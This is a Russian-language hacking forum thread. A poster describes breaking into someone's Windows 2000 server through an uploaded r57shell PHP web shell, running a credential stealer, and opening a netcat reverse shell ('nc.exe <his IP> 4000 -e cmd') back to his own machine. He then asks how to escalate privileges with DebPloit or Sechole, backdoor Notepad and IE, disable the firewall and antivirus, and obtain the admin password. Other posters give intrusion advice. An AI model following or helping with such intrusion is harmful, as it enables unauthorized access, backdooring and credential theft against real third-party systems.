Здраствуйте,
Закачал шел на виндовый сервак (Microsoft Windows 2000 [Version 5.00.2195]),
в шеле моно выполнять команды,
ipconfig показал:
Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.104
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

я так понял сервак локальный.?

закачал netcat
у себя открыл консоль:
c:\put_k_nc\nc.exe -l -p 4000
и там
запустил nc.exe (мой IP) 4000 -e cmd
покавырявшись оказалось что у меня мало прав.
попробывал запустить DebPloit
и нех.. недало, подскажите пожалуйста как поднять прова и че вообще моно сделать.

я так понял сервак локальный.?
Если ты на него залез, то нет. ipconfig показывает настройки сетевых интерфейсов.

Ищи уязвимые дем... эээ, сервисы. Возможно винда не патченная. elsenot.com - все публичные эксплойты/уязвимости и их описания.
И с командной строкой в win работать неудобно, поставь GUI вроде VNC.

Если ты на него залез, то нет
Почему нет??? я ж через php шел залез

И вообще мне кажиется что это виртуалка, памяти на всем серваке 3 гега.
Вот хочю попробывать BackDoor Injector v2.0 заразить блакнот, IE, и еще ченибуть.
Ктонить работал с такой прогой???
Если да то ей моно через консль управлять???
И как удаленно Броузер и фаер. вырубить чтоб неругался на ее???

как можно было зайти на этот сервер,
если ip у него 192.168.1.104?
на чем-то другом порт на него прокинут?

я через сайт залил шел r57shell и зашел.
а там дальше сначала пинча запустил, получил отчет пустой.
Дальше nc запустил чтобы он ко мне приконектился.

Подскажите команду для Вин 2000 чтобы увидет список процессов.
tasklist некатит для 2000
И команду чтобы убить процесс.

как можно было зайти на этот сервер,
если ip у него 192.168.1.104?

Походу это локальный Сервак.....

tasklist некатит для 2000
Тасклист есть только в WinXp Proff.
На сколько я помню, в Win2000 процесс убивается командой kill(-f), а список процессов можно посмотреть командой
TLIST(-t) По-моему. Вообщем не забудь про /?

А как моно добыть пароль админа ????
На серваке включено удаленое управление рабочим сталом и VNC .
Продовал спомощю (- Sechole ) добавить нового пользователя и непрокатило, вылезла такая бодяга: ERROR: could not get the task list
.
для справки:

- Sechole Эта программка как и описанная выше добавляет юзеров в локальную группу админов. Утилита модифицирует в оперативной памяти код вызова процедуры OpenProcess и это позволяет ей подключится к привилегирированному процессу, независимо от того, имеет ли она для этого соответствующие разрешения. После успешного подключения она работает так же как и описанная выше утилита, добавляя юзера в секту Админов.